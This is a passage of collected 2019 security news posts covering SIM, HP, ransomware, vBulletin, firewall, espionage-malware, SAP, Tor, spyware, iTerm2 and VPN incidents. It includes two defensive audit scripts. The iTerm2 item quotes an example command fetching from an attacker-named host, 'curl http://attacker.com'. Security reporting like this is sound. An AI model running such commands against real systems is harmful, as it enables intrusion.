DeleteLocal    (none)                        (none)                 Deletes a local file

In March, the group carried out attacks delivering a previously unseen malware tracked as SQLRat that drops files and executes SQL scripts on the host. The messages sent to the victims were also dropping the backdoor DNSbot that primarily operates over DNS traffic.

In April 2018, FIN7 hackers stole credit and debit card information from millions of consumers who have purchased goods at Saks Fifth Avenue and Lord & Taylor stores.

“While these incidents have also included FIN7’s typical and long-used toolsets, such as CARBANAK and BABYMETAL, the introduction of new tools and techniques provides further evidence FIN7 is continuing to evolve in response to security enhancements.” concludes the report.

“Barring any further law enforcement actions, we expect at least a portion of the actors who comprise the FIN7 criminal organization to continue conducting campaigns.”

Pierluigi Paganini

(SecurityAffairs – FIN7, hacking)


SIM cards used in 29 countries are vulnerable to Simjacker attack

Security researchers at Adaptive Mobile who discovered the SimJacker issue have published the list of countries where mobile operators use flawed SIM cards.

Exactly one month ago, researchers at AdaptiveMobile Security disclosed a critical vulnerability in SIM cards dubbed SimJacker that could be exploited by remote attackers to compromise targeted mobile phones and spy on victims just by sending an SMS.

The SimJacker vulnerability resides in the S@T (SIMalliance Toolbox) Browser dynamic SIM toolkit that is embedded in most SIM cards used by mobile operators in many countries. The experts discovered that the exploitation of the vulnerability is independent of the model of phone used by the victim.

Now Adaptive Mobile has published the list of countries where local mobile operators are using SIM cards affected by the Simjacker flaw, but the company did not name the impacted mobile phone carriers.

“This varies by country and region. From our analysis we could identify 61 Mobile Operators (excluding MVNOs) in the 29 countries that use this technology.” reads the report. “Based on public reported information the cumulative subscriber numbers of these S@T Browser-using Operators comes to ~861 million mobile connections (SIM cards).” “Not all SIM cards in the operator may use this technology. In discussions with a few operators in the LATAM region we were informed that the majority of SIM Cards (>90%) in their network had it.”

Below is the full list of countries published by the experts:

Central America:
Mexico
Guatemala
Belize
Dominican Republic
El Salvador
Honduras
Panama
Nicaragua
Costa Rica

South America:
Brazil
Peru
Colombia
Ecuador
Chile
Argentina
Uruguay
Paraguay

Africa:
Ivory Coast
Ghana
Benin
Nigeria
Cameroon

Europe:
Italy
Bulgaria
Cyprus

Asia:
Saudi Arabia
Iraq
Lebanon
Palestine

The S@T Browser application is installed on multiple SIM cards, including eSIMs, as part of the SIM Tool Kit (STK); it enables the SIM card to initiate actions that can be used for various value-added services.

S@T Browser implements a series of STK instructions (i.e. send, call, launch browser, provide local data, run command, and send data) that can be triggered by sending an SMS to the phone.

The Simjacker attack involves an SMS containing commands that instruct the SIM Card in the phone to ‘take over’ the phone.

The attacker could exploit the flaw to:

  • Retrieve the targeted device’s location and IMEI information,
  • Spread mis-information by sending fake messages on behalf of victims,
  • Perform premium-rate scams by dialing premium-rate numbers,
  • Spy on victims’ surroundings by instructing the device to call the attacker’s phone number,
  • Spread malware by forcing victim’s phone browser to open a malicious web page,
  • Perform denial of service attacks by disabling the SIM card, and
  • Retrieve other information like language, radio type, battery level, etc.

On October 3rd, the experts presented their research at the VB2019 conference in London and published a technical paper on the attack. The paper shows how the flaw is being exploited by threat actors and provides technical details on the technologies used in the attacks.

The experts explained that the attack is transparent to the users; the targets are not able to notice any anomaly.

Adaptive Mobile revealed that a private surveillance firm has been aware of the zero-day flaw for at least two years and has been actively exploiting the SimJacker vulnerability to spy on mobile users in several countries.

“Within the report we outline why we think it is a surveillance company that developed this exploit.” reads a FAQ page published by the experts. “However, we have not named the specific company that we believe is responsible, as to do so, we would need to release some additional proof. That proof would also reveal specific methods and information that would impact our ability to protect subscribers.”

Experts also added that the vulnerability has likely been exploited by nation-state actors for targeted attacks on persons of interest.

After the flaw was publicly disclosed, the researchers at SRLabs developed an Android app, named SnoopSnitch, that can detect Simjacker-like attacks. The SnoopSnitch app only runs on rooted Android mobile phones with a Qualcomm chipset. SRLabs researchers also updated their SIMTester app to include Simjacker.

Experts at Adaptive Mobile also analyzed the impact of the recently disclosed WIBattack and explained that it impacts a smaller number of users compared with SimJacker. Experts estimated that only 8 operators in 7 countries are using SIM cards vulnerable to the attack.

“WIB is a proprietary SIM card technology like S@T which reports show could also be exploited via ‘Simjacker-like’ attacks. However, it’s important to state that we haven’t seen any attacks involving WIB.” concludes the report. “The WIB technology itself seems less prevalent than the S@T Browser (see diagram below and section 7 of the report), and publicly available information doesn’t indicate that WIB has the same apparent oversight in recommended security level.”

The following graph shows the number of Vulnerable Countries & Operators for S@T Browser and WIB.

“This has important implications for all Mobile Operators if they wish to deal with attacks from threat actors like this in the future.” concludes the report. “It means that previous ways of relying on recommendations, with no operational investigation or research won’t be enough to protect the mobile network and its subscribers, and what’s worse, will give a false sense of security.”

Pierluigi Paganini

(SecurityAffairs – SimJacker, hacking)


Tens of million PCs potentially impacted by a flaw in HP Touchpoint Analytics

SafeBreach experts discovered that the HP Touchpoint Analytics service is affected by a potentially serious vulnerability.

Security researchers at SafeBreach have discovered that the HP Touchpoint Analytics service is affected by a serious flaw tracked as CVE-2019-6333. The vulnerability received a CVSS score of 6.7 (medium severity).

TouchPoint Analytics is a service that allows the vendor to anonymously collect diagnostic data about hardware performance; it comes pre-installed on most HP PCs.

HP Touchpoint Analytics

The service is based on the open-source tool Open Hardware Monitor and it is executed as “NT AUTHORITY\SYSTEM.”

The experts noticed that when the service is started, it attempts to load three missing DLL files. An attacker with administrative privileges on the targeted system can create malicious DLLs with the names of the missing files and place them in the locations where they were expected to be to get executed when the HP service starts.

The experts pointed out that the Touchpoint Analytics service has high-permission-level access to the PC hardware; this means that a flaw affecting it could be exploited to escalate privileges to SYSTEM and bypass security features.

“The Open Hardware Monitor library provides a signed kernel driver named “WinRing0,” which is extracted and installed during runtime.” reads the analysis published by the experts.

“As you can see, the service was trying to load three missing DLL files, which eventually were loaded from the c:\python27 directory – our PATH environment variable:

  1. atiadlxx.dll
  2. atiadlxy.dll
  3. Nvapi64.dll”

The researchers also published a PoC code to show how to use the Open Hardware Monitor library to read and write to physical memory.
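To make the weakness concrete from the defender’s side, here is an added audit script (not HP’s, SafeBreach’s or this post’s own code) that models the Windows DLL search order and flags any DLL a service would load from a user-writable directory, which is exactly the situation described above for the three missing DLLs and the PATH entry. The search order is a simplified model (SafeDllSearchMode on: application directory, system directories, then PATH), and the directory layout, DLL names and writable-directory list in the demo are constructed.

```python
"""Audit helper: model the Windows DLL search order and flag DLLs that a
service would resolve from a user-writable directory (DLL search order
hijacking). Added example, not HP's or SafeBreach's code; the search
order is a simplified model and the demo layout is constructed."""
import os
import tempfile
from dataclasses import dataclass, field
from typing import Callable, Iterable, List, Optional, Set


@dataclass
class DllFinding:
    name: str
    loaded_from: Optional[str]                 # directory the loader picks, None if missing
    writable_before_load: List[str] = field(default_factory=list)

    @property
    def hijackable(self) -> bool:
        # A planted copy in any writable directory consulted before the
        # real DLL is found (or anywhere, if the DLL is missing) would be
        # the one the service loads.
        return bool(self.writable_before_load)


def search_order(app_dir: str, system_dirs: Iterable[str],
                 path_entries: Iterable[str]) -> List[str]:
    """Directories in the order the loader consults them (simplified)."""
    return [app_dir, *system_dirs, *path_entries]


def audit_dll(name: str, dirs: List[str],
              is_writable: Callable[[str], bool]) -> DllFinding:
    """Walk the search order once and record every low-privilege-writable
    directory that is consulted before the DLL is actually found."""
    writable: List[str] = []
    for d in dirs:
        if os.path.isfile(os.path.join(d, name)):
            return DllFinding(name, d, writable)
        if is_writable(d):
            writable.append(d)
    return DllFinding(name, None, writable)   # missing DLL: every writable dir is a risk


def audit_service(dll_names: Iterable[str], app_dir: str,
                  system_dirs: Iterable[str], path_entries: Iterable[str],
                  writable_dirs: Optional[Set[str]] = None) -> List[DllFinding]:
    """Audit every DLL a service tries to load. writable_dirs is the set of
    directories a standard user can write to (e.g. from an ACL review);
    when omitted, the current user's own write access is used instead."""
    if writable_dirs is None:
        def is_writable(d: str) -> bool:
            return os.access(d, os.W_OK)
    else:
        wset = {os.path.normcase(os.path.abspath(d)) for d in writable_dirs}

        def is_writable(d: str) -> bool:
            return os.path.normcase(os.path.abspath(d)) in wset
    dirs = search_order(app_dir, system_dirs, path_entries)
    return [audit_dll(n, dirs, is_writable) for n in dll_names]


def build_demo(root: str):
    """Constructed layout: the service ships one real DLL next to its
    binary, two other DLL names are simply absent (as with the HP
    service), and one PATH directory is writable by any user."""
    app = os.path.join(root, "Program Files", "Service")
    system32 = os.path.join(root, "Windows", "System32")
    python27 = os.path.join(root, "python27")        # user-writable, on PATH
    for d in (app, system32, python27):
        os.makedirs(d, exist_ok=True)
    open(os.path.join(app, "present.dll"), "w").close()
    return app, [system32], [python27], {python27}


def run_demo() -> List[DllFinding]:
    """Run the audit against the constructed layout and return the findings."""
    with tempfile.TemporaryDirectory() as root:
        app, sysdirs, path, writable = build_demo(root)
        return audit_service(["present.dll", "atiadlxx.dll", "Nvapi64.dll"],
                             app, sysdirs, path, writable)


if __name__ == "__main__":
    for f in run_demo():
        status = "HIJACKABLE" if f.hijackable else "ok"
        print(f"{f.name:14} loaded_from={f.loaded_from} {status} {f.writable_before_load}")
```

On a real host the inputs come from a Process Monitor trace (DLL names and the service's directory) and from an ACL review of each PATH entry; the fix HP shipped removes the problem at the source by no longer loading those names.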

The flaw could impact tens of millions of computers running the HP Touchpoint Analytics or Open Hardware Monitor.

“A potential security vulnerability has been identified with certain versions of HP Touchpoint Analytics prior to version 4.1.4.2827.” reads the security advisory published by HP. “This vulnerability may allow a local attacker with administrative privileges to execute arbitrary code via an HP Touchpoint Analytics system service.”

The experts reported the flaw to HP in early July and it was addressed this month with the release of version 4.1.4.2827.

Pierluigi Paganini

(SecurityAffairs – Touchpoint Analytics, hacking)


Researchers released a free decryptor for the Nemty Ransomware

Good news for the victims of the Nemty Ransomware, security researchers have released a free decryptor that could be used to recover files.

I have great news for the victims of the recently discovered Nemty Ransomware, security researchers have released a free decryptor tool that could be used to recover files.

In mid-August, the Nemty ransomware appeared in the threat landscape; the name of the ransomware comes from the extension it adds to the encrypted file names. The malicious code also deletes the shadow copies of the files to make any recovery procedure impossible.

Below is the ransom note dropped by the Nemty ransomware after the encryption process is completed. Attackers demand the payment of a 0.09981 BTC ransom (roughly $1,000) through a portal hosted on the Tor network.

Nemty ransomware

Crooks used multiple attack vectors to distribute the ransomware; according to the popular malware researcher Vitali Kremez, it is mainly dropped via compromised remote desktop connections.

Now researchers from the security firm Tesorion have developed a decryptor tool that works on Nemty versions 1.4 and 1.6, they also announced a working tool for version 1.5.

The security firm is also working with Europol to get its decryptors included in the NoMoreRansom project.

“As 1.6 is the most recent version of the two, we have been focussing our efforts on this version first. We now have a working decryptor for version 1.6. Please contact Tesorion CSIRT to obtain our decryptor for free if you are a victim of Nemty 1.6. We are also finishing our decryptor for Nemty 1.5 and expect to release it soon as well.” reads the post published by Tesorion.

The decryptor currently supports only a limited number of file extensions, but the researchers are working to improve it and support other file types.

Tesorion is not allowing victims to generate the decryption keys with their client, instead, it is allowing victims to retrieve the decryption key by generating it on its own servers.

Victims can contact the Tesorion CSIRT and request help with the Nemty Ransomware; the company will then send a link to the decryptor that allows them to decrypt their files.

“Tesorion told BleepingComputer they went this route in order to prevent the ransomware developers from analyzing the decryptor and learning the weakness in their algorithm.” reported BleepingComputer.

Victims can upload their files to the Tesorion servers, which use them to calculate the decryption key; the key is then sent back to the victims, who can load it in the decryptor.

Pierluigi Paganini

(SecurityAffairs – Nemty ransomware, malware)


Hacker breached escort forums in Italy and the Netherlands and is selling user data

Popular prostitution and escort forums in Italy and the Netherlands have been hacked and data have been offered for sale in the cybercrime underground.

A Bulgarian hacker known as InstaKilla has breached two online escort forums and stole the user information that he is now offering for sale on a hacking forum.

The two escort forums are EscortForumIt.xxx and Hookers.nl; they are used by sex workers and their customers in Italy and the Netherlands, and both websites have confirmed the breaches.

Experts report that a forum for Zooville zoophilia and bestiality fans was also hacked and its data offered for sale.

The Dutch news site NOS revealed that a hacker is selling the Dutch hookers.nl forum database for $300 on online forums. The exposed data includes user names, hashed passwords, and IP addresses for roughly 250,000 members.

“The account details of the 250,000 users of the Dutch website Hookers.nl have been leaked. This includes e-mail addresses. The website is popular among visitors to prostitutes and escorts, who exchange experiences and tips.” reported the NOS website.

“A hacker has captured the data from the members and offers it for sale, according to a study by the NOS after reporting an anonymous source.”

The hacker is also selling 33,000 records stolen from the Italian forum.

Both escort forums were running outdated versions of the popular vBulletin forum software. At the end of September, an anonymous hacker disclosed technical details and proof-of-concept exploit code for a critical zero-day remote code execution flaw in vBulletin (CVE-2019-16759). A few days later, the security expert Troy Mursch observed a botnet utilizing the recently disclosed vBulletin exploit to secure vulnerable servers so that they could not be compromised by other threat actors. Likely, the Bulgarian hacker exploited the same flaw to compromise the escort forums, which had not been updated by their admins.

“According to a sample of the data obtained by ZDNet, in the case of the Dutch forum, the hacker also appears to have gained access to the site’s internal paid subscription system, although there was no financial information included in the sample we received.” reported ZDNet.

InstaKilla is the same hacker who stole data from millions of Bulgarians in July and sent it to local media, the hacker is now offering for sale data from tens of other vBulletin-based forums.

Users of the escort forums are potentially exposed to extortion phishing campaigns similar to what has happened after the Ashley Madison hack.

Pierluigi Paganini

(SecurityAffairs – escort forums, vBulletin)


Security Affairs 2019-10-11 00:14:11

A vulnerability in Sophos Cyberoam firewalls could be exploited by an attacker to gain access to a target’s internal network without authentication.

Sophos addressed a vulnerability in its Cyberoam firewalls that could be exploited by an attacker to gain access to a company’s internal network without providing a password.

“A critical shell injection vulnerability in Sophos Cyberoam Firewall appliances running CyberoamOS (CROS) version 10.6.6 MR-5 and earlier was recently discovered and responsibly disclosed to Sophos by an external security researcher.” reads the advisory published by Sophos.

“The vulnerability can be potentially exploited by sending a malicious request to either the Web Admin or SSL VPN consoles, which would enable an unauthenticated remote attacker to execute arbitrary commands.”

Cyberoam firewall

The vulnerability is a critical shell injection flaw that could allow a remote attacker to gain “root” permissions on vulnerable equipment; it could be exploited by sending malicious commands across the internet.

The vulnerability, tracked as CVE-2019-17059, was discovered by the security expert Rob Mardisalu, who reported it to Sophos. The expert also reported the issue to TechCrunch, which first reported the news.

“We’ve been working hard with internal and external security researchers to uncover serious remotely exploitable loopholes in SSL VPNs and Firewalls like Cyberoam, Fortigate and Cisco VPNs.” reads the security advisory published by the expert. “This Cyberoam exploit, dubbed CVE-2019-17059 is a critical vulnerability that lets attackers access your Cyberoam device without providing any username or password. On top of that, the access granted is the highest level (root), which essentially gives an attacker unlimited rights on your Cyberoam device.”

Cyberoam firewalls are used in large enterprises, they offer stateful and deep packet inspection for network, application and user identity-based security. Cyberoam Firewall protects organizations from DoS, DDoS and IP Spoofing attacks.

Mardisalu revealed that according to Shodan there are more than 96,000 internet-facing Cyberoam devices worldwide, most of them in enterprises, universities and banks.

The flaw is similar to the recently disclosed vulnerabilities in Palo Alto Networks, Pulse Secure and Fortinet VPN solutions.

“It’s a similar vulnerability to recently disclosed flaws in corporate VPN providers, notably Palo Alto Networks, Pulse Secure and Fortinet, which allowed attackers to gain access to a corporate network without needing a user’s password.” reported TechCrunch. “Many large tech companies, including Twitter and Uber, were affected by the vulnerable technology, prompting Homeland Security to issue an advisory to warn of the risks.”

The flaw affects Cyberoam Firewalls running CROS 10.6.6 MR-5 and earlier, Sophos plans to include a fix in the next update of its CyberoamOS operating system.

“There are a small amount of devices that have not as of yet been patched because the customer has turned off auto-update and/or are not internet-facing devices.” said the spokesperson.

The researcher will release the proof-of-concept code in the coming months.

Pierluigi Paganini

(SecurityAffairs – Cyberoam firewalls, hacking)


Attor malware was developed by one of the most sophisticated espionage groups

New espionage malware found targeting Russian-speaking users in Eastern Europe

ESET found an advanced piece of malware named Attor, targeting diplomats and high-profile Russian-speaking users in Eastern Europe.

ESET researchers discovered an advanced piece of malware named Attor that was used in cyberespionage operations against diplomats and high-profile Russian-speaking users in Eastern Europe.

Attor malware

Threat actors have been using Attor since 2013, the malicious code remained under the radar until last year.

The researchers believe that the threat actor behind Attor is a state-sponsored group involved in highly targeted attacks on selected targets.

“Attor’s espionage operation is highly targeted – we were able to trace Attor’s operation back to at least 2013, yet, we only identified a few dozen victims.” reads the analysis published by ESET.

“For example, in order to be able to report on the victim’s activities, Attor monitors active processes to take screenshots of selected applications. Only certain applications are targeted – those with specific substrings in the process name or window title.”

The researchers believe that the malware was specifically developed to infect mainly Russian-speaking users, it targets popular Russian apps and services, including the social networks Odnoklassniki, and VKontakt, VoIP provider Multifon, IM apps Qip and Infium, search engine Rambler, email clients Yandex and Mail.ru, and payment system WebMoney.

The malware implements a modular structure with a dispatcher and loadable plugins, all of which are implemented as dynamic-link libraries (DLLs). The attackers first compromise the target, dropping the components on disk, and then load the dispatcher DLL.

The Attor malware makes sophisticated use of encryption to hide its components.

The plugins are delivered as DLLs asymmetrically encrypted with RSA; they are then recovered in memory using the public RSA key embedded in the dispatcher.

“In total, the infrastructure for C&C communication spans four Attor components – the dispatcher providing encryption functions, and three plugins implementing the FTP protocol, the Tor functionality and the actual network communication.” continues the analysis. “This mechanism makes it impossible to analyze Attor’s network communication unless all pieces of the puzzle have been collected.”

“We were able to recover eight of Attor’s plugins, some in multiple versions – we list them in Table 2. Assuming the numbering of plugins is continuous, and that actors behind Attor may use different sets of plugins on a per‑victim basis, we suspect there are even more plugins that have not yet been discovered.” continues the analysis.

The analysis of the malware samples revealed the presence of an interesting module designed to detect when users connect modems and older phones to their devices. The malware is able to collect information about the files present on connected devices.

“The most curious plugin in Attor’s arsenal collects information about both connected modem/phone devices and connected storage drives, and about files present on these drives. It is responsible for collection of metadata, not the files themselves, so we consider it a plugin used for device fingerprinting, and hence likely used as a base for further data theft.” reads the report.

“While Attor’s functionality of fingerprinting storage drives is rather standard, its fingerprinting of GSM devices is unique.”

Attor’s device monitoring module implements a unique fingerprinting feature of GSM devices. Whenever a modem or a phone device is connected to a COM port, Device monitor uses AT commands to communicate with it.

ESET believes that the authors of the Attor malware developed this module to target users owning older mobile handsets, or even a custom GSM-capable platform.

“A more likely explanation of the plugin’s main motive is that it targets modems and older phones. Alternatively, it may be used to communicate with some specific devices (used by the victim or target organization) that are connected to the COM port or to the USB port using a USB-to-serial adaptor.” concludes the analysis. “In this scenario, it is possible the attackers have learned about the victim’s use of these devices using some other reconnaissance techniques.”

Pierluigi Paganini

(SecurityAffairs – Attor, malware)

The post Attor malware was developed by one of the most sophisticated espionage groups appeared first on Security Affairs.

SAP October 2019 Security Patch Day fixes 2 critical flaws

SAP addressed two critical vulnerabilities (Hot News) as part of the October 2019 Security Patch Day.

SAP has released its October 2019 Security Patch Day updates that also address two critical vulnerabilities (Hot News) with CVSS scores of 9.3 and 9.1.

The October 2019 Security Patch Day also includes a High Priority Note addressing a Binary Planting vulnerability.

“With only nine new and one updated Security Note, SAP has published an unusually low number of Security Notes for October 2019.” reads the analysis published by security firm Onapsis. “This is the lowest number of newly published notes in the past five years. Nevertheless, with 2 HotNews Notes and one High Priority Note, this Patch Day deserves special attention as an attacker needs only one vulnerability for a successful attack.”

The most severe SAP Security Note is #2826015, a Missing Authentication Check in the AS2 Adapter of the B2B Add-On for SAP NetWeaver Process Integration. The vulnerability, tracked as CVE-2019-0379, could be exploited by remote attackers to steal or manipulate sensitive data; it could also provide attackers with access to administrative and other privileged functionality.

“The adapter specifies a comprehensive set of data security features, specifically data confidentiality and data authenticity, which are aimed at the B2B commerce environment. The configuration of the AS2 adapter allows two different security providers.” reads the analysis published by Onapsis. “Depending on the selected provider, a Missing Authentication vulnerability exists that can lead to sensitive data theft or data manipulation as well as to access to administrative and other privileged functionalities.”

The vulnerability received a CVSS score of 9.3.

The second Hot News (SAP Security Note #2828682) addresses a flaw tracked as CVE-2019-0380, an information disclosure flaw in SAP Landscape Management enterprise edition. The flaw affects version 3.0 and received a CVSS score of 9.1.

“SAP Security Note #2828682 talks about a risk of information disclosure if these custom parameters fulfill specific conditions. SAP describes the overall conditions for the existence of the vulnerability as “uncommon”.”

The vulnerability is related to the custom parameters that can be added by users to providers assigned to custom operations.


SAP also addressed a Binary Planting vulnerability in several SAP software products, including Anywhere, SAP IQ and SAP Dynamic Tiering. The flaw, tracked as CVE-2019-0381, resides in the file search algorithm of the affected products; it received a CVSS score of 7.8.

“The algorithm searches too many directories, even if they are out of the application scope.” Onapsis explains. “Possible impacts are path traversals and directory climbing, enabling an attacker to read, overwrite, delete, and expose arbitrary files of the system. This can also lead to DLL hijacking as well as to privilege elevation.”

SAP also addressed multiple Cross-Site Scripting (XSS) vulnerabilities in its products, rated as medium, including one in Customer Relationship Management (CVE-2019-0368) and multiple issues in the SAP BusinessObjects Business Intelligence Platform (CVE-2019-0374, CVE-2019-0375, CVE-2019-0376, CVE-2019-0377, and CVE-2019-0378).

The full list of the addressed issues in SAP Security Patch Day – October 2019 is available here.

Pierluigi Paganini

(SecurityAffairs – SAP, hacking)


Tor Project is going to remove End-Of-Life relays from the network

Maintainers at the Tor Project have removed from the network more than 800 relay servers running outdated and EOL versions of the Tor software.

Currently, the Tor network is composed of more than 6000 relays, some of them running outdated Tor software versions (in some cases back to the 0.2.4.x versions). Other relays are running the latest Tor software in nightly builds and alpha releases. Maintainers of the Tor Project announced they have removed relay servers running outdated and EOL versions of the Tor software.

Tor Project experts pointed out that they currently maintain only 5 Tor version series, 0.2.9.x (LTS), 0.3.5.x (LTS), 0.4.0.x, 0.4.1.x, 0.4.2.x (Stable on Dec 15th, 2019).

Now the maintainers of the project have announced that they removed roughly 13.5% of the relay servers: 750 acting as Tor middle relays and 62 as exit relays.

The presence of End-Of-Life relays in the Tor network has multiple negative impacts on network stability and security. It also complicates maintenance, because it is not easy to roll out important fixes and new features to them.

“In the past weeks, we’ve taken steps to contact every relay operator with a valid ContactInfo field to ask them to upgrade to the latest stable release. The Tor relay community was informed via the tor-relays mailing list on September 3rd 2019 of this upcoming change.” reads the announcement published by the Tor Project.

“The End-Of-Life relays in the network currently make up just over 12% of the total bandwidth, or around 750 relays. Out of these, only 62 are Exit relays accounting for only 1.68% of the total Exit traffic. We expect a minor impact on the size of the network, and a small drop in the Metrics graph.”

The maintainers expect a new Tor stable release in November, which will reject End-Of-Life relays by default. Until then, the maintainers will reject obsolete relays using their fingerprints.

Instructions for upgrading End-Of-Life relays are included in the announcement.
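As an added example (not the Tor Project's own tooling), the check below classifies relay software versions against the five maintained series listed above and returns the fingerprints of relays that should be rejected; alpha and nightly builds newer than the newest stable series are treated as pre-release rather than EOL. The descriptor lines and fingerprints are constructed for the example; server descriptors announce the software on a "platform Tor <version> on <os>" line.

```python
import re

# Version series the Tor Project said it still maintains, from the announcement above.
MAINTAINED_SERIES = ("0.2.9", "0.3.5", "0.4.0", "0.4.1", "0.4.2")

# "0.2.4.27", "Tor 0.4.2.1-alpha", "0.4.3.0-alpha-dev": major.minor.micro[.patch][-tag]
VERSION_RE = re.compile(
    r"^(?:Tor\s+)?(\d+)\.(\d+)\.(\d+)(?:\.(\d+))?(?:-([A-Za-z0-9.-]+))?$"
)
# Server descriptors announce the software on a "platform Tor <version> on <os>" line.
PLATFORM_RE = re.compile(r"^platform\s+Tor\s+(\S+)")


def parse_version(text: str) -> tuple:
    """Return (major, minor, micro, patch, tag) for one Tor version string."""
    m = VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised Tor version: {text!r}")
    major, minor, micro = (int(m.group(i)) for i in (1, 2, 3))
    patch = int(m.group(4)) if m.group(4) else 0
    tag = m.group(5) or ""        # "alpha", "alpha-dev", "rc" or "" for a release
    return (major, minor, micro, patch, tag)


def classify(text: str) -> str:
    """'supported', 'end-of-life' or 'pre-release' for one version string."""
    series = parse_version(text)[:3]
    maintained = sorted(tuple(int(p) for p in s.split(".")) for s in MAINTAINED_SERIES)
    if series in maintained:
        return "supported"
    if series > maintained[-1]:
        # Alpha and nightly builds of a series newer than the newest maintained one.
        return "pre-release"
    # Anything else (0.2.4.x, 0.3.4.x, ...) is a series nobody maintains any more.
    return "end-of-life"


def eol_fingerprints(descriptors) -> list:
    """From (fingerprint, platform_line) pairs, return the relays to reject."""
    rejected = []
    for fingerprint, platform_line in descriptors:
        m = PLATFORM_RE.match(platform_line)
        if not m:
            continue       # no parsable platform line: do not guess, leave the relay alone
        try:
            if classify(m.group(1)) == "end-of-life":
                rejected.append(fingerprint)
        except ValueError:
            continue       # odd version string: same policy, skip rather than reject
    return rejected


# Constructed sample descriptors; the fingerprints are placeholders, not real relays.
SAMPLE_DESCRIPTORS = [
    ("FP-OLD-1", "platform Tor 0.2.4.27 on Linux"),
    ("FP-OLD-2", "platform Tor 0.3.4.11 on FreeBSD"),
    ("FP-LTS-1", "platform Tor 0.3.5.8 on Linux"),
    ("FP-NEW-1", "platform Tor 0.4.1.6 on Linux"),
    ("FP-ALPHA-1", "platform Tor 0.4.2.1-alpha on Linux"),
    ("FP-NIGHTLY-1", "platform Tor 0.4.3.0-alpha-dev on Linux"),
    ("FP-UNKNOWN-1", "platform something else"),
]

if __name__ == "__main__":
    print(eol_fingerprints(SAMPLE_DESCRIPTORS))   # ['FP-OLD-1', 'FP-OLD-2']
```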

Pierluigi Paganini

(SecurityAffairs – Tor, privacy)


Amnesty claims that 2 Morocco rights advocates were targeted by NSO Group spyware

NSO Group’s surveillance spyware made the headlines again; this time the malware was used to spy on two rights activists in Morocco, according to Amnesty International.

Amnesty International collected evidence of new abuses of NSO Group’s surveillance spyware; this time the malware was used to spy on two rights activists in Morocco.

Experts at Amnesty International analyzed the devices of Abdessadak El Bouchattaoui for evidence of targeting and confirmed that he was targeted repeatedly with malicious SMS messages carrying links to websites connected to NSO Group’s Pegasus spyware.

“After checking his devices for evidence of targeting, Amnesty International was able to confirm that Abdessadak El Bouchattaoui was indeed targeted repeatedly with malicious SMS messages that carried links to websites connected to NSO Group’s Pegasus spyware.” reads the analysis published by Amnesty International.

The organization also discovered that the spyware was used to spy on Maati Monjib; the rights group believes the operation is part of state-sponsored repression of human rights defenders.

Bouchattaoui is a lawyer and human rights defender (HRD). In February 2017, a court in Al Hoceima sentenced him to 20 months in prison and a fine for online posts in which he criticized the use of excessive force by the authorities during the Hirak El-Rif social justice protests across 2016 and 2017. Monjib is a historian and a columnist, and co-founder of the NGO Freedom Now, which in 2015 was accused of threatening the internal security of the state “through propaganda.”


The victims were targeted with messages related to the Hirak El-Rif movement and the subsequent repression by the Moroccan security forces. The messages included links that, once clicked by the victims, would start the attack chain allowing the attacker to remotely control the device.

The links used in these attacks are similar to the ones detected in June 2018 by Amnesty International in operations against an Amnesty staff member and a Saudi HRD.

“SMS messages sent to Moroccan Human Rights Defenders, as documented in this report, also carry similar links to the same set of Internet infrastructure attributed to NSO Group.” states the report.

“NSO Group is known to only sell its spyware to government intelligence and law enforcement agencies, raising serious concerns that Moroccan security agencies are behind the surveillance.”

NSO Group rejects the accusations and claims that its surveillance technology is only used for lawful purposes.

In May, Amnesty International filed a lawsuit against the Israeli surveillance firm NSO; the lawsuit was filed in Israel by about 50 members and supporters of the human rights group. The organization calls on the Israeli ministry of defence to ban the export of the Pegasus surveillance software developed by NSO Group.

Pierluigi Paganini

(SecurityAffairs – NSO Group, hacking)


Oops, popular iTerm2 macOS Terminal App is affected by a critical RCE since 2012

Security experts discovered a critical remote code execution vulnerability, tracked as CVE-2019-9535, in the GPL-licensed iTerm2 macOS terminal emulator app.

Security experts at the cybersecurity firm Radically Open Security (ROS) discovered a 7-year-old critical remote code execution vulnerability in the GPL-licensed iTerm2 macOS terminal emulator app.

The iTerm2 macOS terminal emulator app is one of the most popular open-source replacements for Mac’s built-in terminal app.

The RCE flaw tracked as CVE-2019-9535 was discovered as part of an independent security audit funded by the Mozilla Open Source Support Program (MOSS).

“A security audit funded by the Mozilla Open Source Support Program (MOSS) has discovered a critical security vulnerability in the widely used macOS terminal emulator iTerm2.” reads the security advisory published by Mozilla. “During the audit, ROS identified a critical vulnerability in the tmux integration feature of iTerm2; this vulnerability has been present in iTerm2 for at least 7 years. An attacker who can produce output to the terminal can, in many cases, execute commands on the user’s computer.”

The RCE vulnerability resides in the tmux integration feature of iTerm2; it could be exploited by an attacker to execute arbitrary commands by providing malicious output to the terminal.

The experts published a video PoC that shows how the vulnerability is triggered by producing output to the terminal. Possible attack vectors include connecting to an attacker-controlled SSH server or running commands such as curl http://attacker.com and tail -f /var/log/apache2/referer_log.

“Typically, this vulnerability would require some degree of user interaction or trickery; but because it can be exploited via commands generally considered safe, there is a high degree of concern about the potential impact,” Mozilla concludes.

iTerm2 version 3.3.6 addresses the flaw, which affects all prior versions.

Pierluigi Paganini

(SecurityAffairs – iTerm2, hacking)


Multiple APT groups are exploiting VPN vulnerabilities, NSA warns

The NSA is warning of multiple state-sponsored cyberespionage groups exploiting enterprise VPN flaws.

Last week, the UK’s National Cyber Security Centre (NCSC) reported that advanced persistent threat (APT) groups have been exploiting recently disclosed vulnerabilities in enterprise VPN products in attacks in the wild. Threat actors leverage VPN vulnerabilities in Fortinet, Palo Alto Networks and Pulse Secure products to break into the target networks.

The UK agency reported that APT groups target several vulnerabilities, including CVE-2019-11510 and CVE-2019-11539 in Pulse Secure VPN solutions, and CVE-2018-13379 in FortiOS.

CVE-2018-13379 is a path traversal vulnerability in the FortiOS SSL VPN web portal that could be exploited by an unauthenticated attacker to download FortiOS system files. The flaw could be exploited to obtain administrator credentials in plain text.

The CVE-2019-11510 flaw in Pulse Connect Secure is a critical arbitrary file read vulnerability.

APT groups also exploit CVE-2018-13382, CVE-2018-13383, and CVE-2019-1579, in Palo Alto Networks products.

The vulnerabilities were first reported in July by researchers Orange Tsai and Meh Chang from DEVCORE, who found several flaws in Fortinet, Palo Alto Networks and Pulse Secure products. The issues could be exploited by threat actors to access corporate networks and steal sensitive documents.

Microsoft researchers recently reported that the APT5 cyberespionage group (aka MANGANESE) has been exploiting VPN vulnerabilities since July, some weeks before PoC exploits were publicly disclosed.

Now the NSA is warning of multiple state-sponsored cyberespionage groups exploiting enterprise VPN flaws.

